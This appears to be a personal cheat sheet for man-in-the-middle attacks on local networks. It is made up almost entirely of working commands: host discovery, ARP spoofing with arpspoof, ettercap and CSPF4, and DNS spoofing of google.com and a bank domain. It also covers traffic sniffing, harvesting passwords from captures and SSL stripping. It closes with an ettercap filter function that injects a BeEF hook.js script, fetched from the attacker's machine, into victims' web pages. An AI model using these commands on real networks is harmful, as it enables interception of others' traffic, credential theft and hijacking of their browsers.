dsniff: {arpspoof , dnspoof } ettercap nmap netdiscover CSPF4 Mitm Framework beef-xss bettercap tcpdump tshark NetworkMiner wireshark
- ifconfig
- ifconfig
- ifconfig wlan0
- route -n
-
nmap -sn -r cidr
-
nmap -sn -r 192.168.1.1/24
- netdiscover -r cidr -c -s
-c count: number of times to send each ARP request (for nets with packet loss) -s time: time to sleep between each ARP request (milliseconds)
- netdiscover -r 192.168.1.1/24
- netdiscover -r 192.168.1.1/24 -c 10 -s 500
https://github.com/Crypt00o/CSPF4
1- first follow installtion steps
- ./cspf4
- ./cspf4
scan <ip>
scan <cidr>
Example:
scan 192.168.1.1
scan 192.168.1.1/24
- sysctl -w net.ipv4.ip_forward=1
- echo 1 > /proc/sys/net/ipv4/ip_forward
we have 2 machines :
-
A) 192.168.1.1 00:00:5e:00:53:af
-
B) 192.168.1.2 12:3c:22:01:53:d3
-
C) 192.168.1.3 01:23:ac:03:00:4e
-
Attacker is C , Gateway is A , Target is B
** first we start a loop of arp replay every second or every specific period to send spoof packet for gateway and target to tell gateway we are the target and tell the target we are the router.**
loop:
- arpreplay psrc=gatewayip pdst=targetip hwsrc=ourmac hwdst=targetmac
- arpreplay psrc=targetip pdst=gatewayip hwsrc=ourmac hwdst=gatewaymac
-
ettercap -i -M Method:subMethod -TQ "/Target1;Target2;Target3//" "/Target4// -P dns_spoof "
-
ettercap -i wlan0 -M Arp:Remote -TQ "/192.168.1.2;192.168.1.3;192.168.1.10//" "/192.168.1.1//"
-
after joining cli session useing : ./cspf4 you can run many commands
-
./cspf4 wlan0
- arpspf
arpspf 192.168.1.1 192.168.1.125
- arpspf all
- arpspf 192.168.1.1 192.168.1.125 all
- arpspoof -i -c -t -r
we specify the target which we send a spoof packet to him and told him we are the host by sending our mac as hdsrc and the host ip as ipsrc
- arpspoof -i wlan0 -t 192.168.1.2 -r 192.168.1.1 &
- arpspoof -i wlan0 -t 192.168.1.1 -r 192.168.1.2 &
Machine A said ‘ping google.com’ Now it has to find that IP address of google.com So it queries the DNS server with regard to the IP address for the domain google.com The DNS server will have its own hierarchy, and it will find the IP address of google.com and return it to Machine A with dnsspoofing we will replay with our dns repsonse which contain another ip
- dnsspoof -i -f <fileof_hosts_2_spoof> host and udp port
1- first poisoning target's ArpCache
printf "127.0.0.1\tgoogle.com\n127.0.0.1\tbank_of_america.com" > /tmp/dns_to_spoof.txt * dnsspoof -i wlan0 -f /tmp/dns_to_spoof.txt udp port 53
printf "127.0.0.1\tgoogle.com\n127.0.0.1\tbank_of_america.com" > /tmp/dns_to_spoof.txt * dnsspoof -i wlan0 -f /tmp/dns_to_spoof.txt host 192.168.1.2 udp port 53
1- Open the /usr/share/ettercap/etter.dns in the 122 machine and add the following,
*.google.co.in A 192.168.1.12 *.google.com A 192.168.1.12 google.com A 192.168.1.12
www.google.com PTR 192.168.1.12 www.google.co.in PTR 192.168.1.12
-
- ettercap -TQ -i -M Method:subMethod -P dns_spoof "/ipofthetargets//" "/ipofthetargets//"
3)- with CSPF4 :
** inside CSPF4 Session run: **
* dnsspf target1 target2 dns_to_spoof
* dnsspf target1 target2 all # to spoof all dns_queries
-
dnsspf 192.168.1.1 192.168.1.125 google.com -
dnsspf 192.168.1.1 192.168.1.125 all
- Sniffing with tcpdump
-
tcpdump -i "filter"
-
"filter" : you can use any wireshark or tshark filter
=========================================================================
--count |-c count : count and number of packet to capture -r file : read from pcap file -w file : write to pcap file -v[vvvv] : versposing and decodeing and increase packet info -X : Show the packet’s contents in both hex and ASCII. -A : Show th packet’s contents in ASCII
Example :
- tcpdump -i wlan0 "host 192.168.1.1 and port 53" -vv
- tcpdump -i wlan0 "src 192.168.1.2 and dst 192.168.1.1 and port 80" -A -c 100
https://danielmiessler.com/study/tcpdump/
- Sniffing With CSPF4:
run "sniff" command inside cspf4 session
- 1-it will ask you for Packetnumber to capture click enter if you won,t to specify it.
- 2-it will ask you to enter a Filter if you want ti use custom filter to filterpackets if you won,t specify a filter click enter
- 3-it will ask you for filename to save capature data if you won,t to savee it just press enter
and finally congratulation you now sniffing network traffic
- Ettercap
*ettercap -TQ -r file.pcap
- TcpDump
- tcpdump -X -r file.pca
- tcpdump -A -r file.pcap
- Tshark
- tshark -z follow,tcp,ascii,0 -P -r file.pcap
- With Strings
- strings file.cap
- With NetworkMiner
i advice useing this , it,s really like mineing everything photos,videos,files,passwords,docs,anything :D
see https://www.netresec.com/?page=Blog&tag=Linux
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
- sslstrip -a -f -l 8080 -w ssl
- ettercap -TQ -i -M Method:subMethod /ipofthetargets// /ipofthetargets//
- with ettercap + beefxss
- 1- hooks body and head function crypto_bitm_mitm(){ printf 'if(ip.proto== TCP && tcp.dst == 80) {\n\tif (search(DATA.data,"Accept-Encoding")) {\n\t\treplace("Accept-Encoding", "Accept-Nothing!");\n\t}\n}\nif (ip.proto== TCP && tcp.src == 80) {\n\tif (search(DATA.data,"")) {\n\t\treplace("", "<script src="http://%s:3000/hook.js"></script>"); \n\t\tmsg("0xCrypt00o,Hooked This Machine with beef-xss hook");\n\t}\n\tif (search(DATA.data,"")) {\n\t\treplace("", "<script src="http://%s:3000/hook.js"></script> "); \n\t\tmsg("0xCrypt00o,Hooked This Machine with beef-xss hook");\n\t}\n\tif (search(DATA.data,"")) {\n\t\treplace("", "<script src="http://%s:3000/hook.js"></script> "); \n\t\tmsg("0xCrypt00o,Hooked This Machine with beef-xss hook");\n\t}\n\tif (search(DATA.data,"")) {\n\t\treplace("", "<script src="http://%s:3000/hook.js"></script> "); \n\t\tmsg("0xCrypt00o,Hooked This Machine with beef-xss hook");\n\t}\n}' $1 $1 $1 $1 > /tmp/0xCrypt00o.filter && etterfilter /tmp/0xCrypt00o.filter -o /tmp/0xCrypt00o.ef && export crypto_filter=/tmp/0xCrypt00o.ef ;
}
or
function crypto_bitm_mitm(){ printf 'if(ip.proto== TCP && tcp.dst == 80) {\n\tif (search(DATA.data,"Accept-Encoding")) {\n\t\treplace("Accept-Encoding", "Accept-Nothing!");\n\t}\n}\nif (ip.proto== TCP && tcp.src == 80) {\n\tif (search(DATA.data,"")) {\n\t\treplace("", "<script src="http://%s:3000/hook.js"></script>"); \n\t\tmsg("0xCrypt00o,Hooked This Machine with beef-xss hook");\n\t}\n\tif (search(DATA.data,"")) {\n\t\treplace("", "<script src="http://%s:3000/hook.js"></script> "); \n\t\tmsg("0xCrypt00o,Hooked This Machine with beef-xss hook");\n\t}\n}' $1 $1 > /tmp/0xCrypt00o.filter && etterfilter /tmp/0xCrypt00o.filter -o /tmp/0xCrypt00o.ef && export crypto_filter=/tmp/0xCrypt00o.ef ;
}
-
crypto_bitm_mitm 192.168.1.109
-
ettercap -TQ -M ARP:REMOTE -f $crypto_filter "/ipofthetargets//" "/ipofthetargets//"
we can use etterfilter and etterfilter syntax to write and compile our filter to replace everything in html
- Using any http server & with dnsspoof & beefxss
- 1- first dnsspoof targets and hosts
- 2- curl http://yoursite.com -o index.html
- 3- put your hook at the head, <script src="http://yourip:3000/hook.js"></script>
- 4- choose apache2 or nginx or twistd http server to serve
- 5- start serveing
- Using Bettercap & beefxss
-
useful resources
3 ) through fake hotspot
- Rouge Access Point + MITM https://www.geeksforgeeks.org/mitm-man-in-the-middle-create-virtual-access-point-using-wi-hotspot-tool/